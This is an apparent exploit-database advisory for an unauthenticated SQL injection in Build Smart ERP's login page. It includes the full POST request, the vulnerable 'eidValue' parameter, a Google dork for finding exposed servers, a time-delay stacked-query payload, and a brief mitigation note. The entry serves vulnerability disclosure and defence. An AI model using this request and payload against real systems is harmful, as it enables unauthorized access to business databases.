Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)

vendor:

Build Smart ERP

by:

Nehru Sethuraman

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Build Smart ERP

Affected Version From: 21.0817

Affected Version To: 21.0906

Patch Exists: NO

Related CWE:

CPE: a:ribccs:buildsmart:21.0817

Metasploit:

Other Scripts:

Platforms Tested: Windows 2012 R2 or 8.1 & Microsoft SQL Server 2014

2021

Build Smart ERP 21.0817 – ‘eidValue’ SQL Injection (Unauthenticated)

A SQL injection vulnerability exists in Build Smart ERP 21.0817, which allows an unauthenticated attacker to execute arbitrary SQL commands via the 'eidValue' parameter in a POST request to the validateLogin.asp page. The payload ';WAITFOR DELAY '0:0:3'-- can be used to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

# Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
# Date: 24/10/2021
# Exploit Author: Nehru Sethuraman
# Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
# Version: 21.0817
# Build: 3
# Google Dorks: intitle:buildsmart accounting
# Tested on: OS - Windows 2012 R2 or 8.1  & Database - Microsoft SQL Server 2014

Exploit Details:

URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=

*HTTP Method:* POST

*POST DATA:*

VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=

Vulnerable Parameter: eidValue

SQL Injection Type: Stacked queries

Payload: ';WAITFOR DELAY '0:0:3'--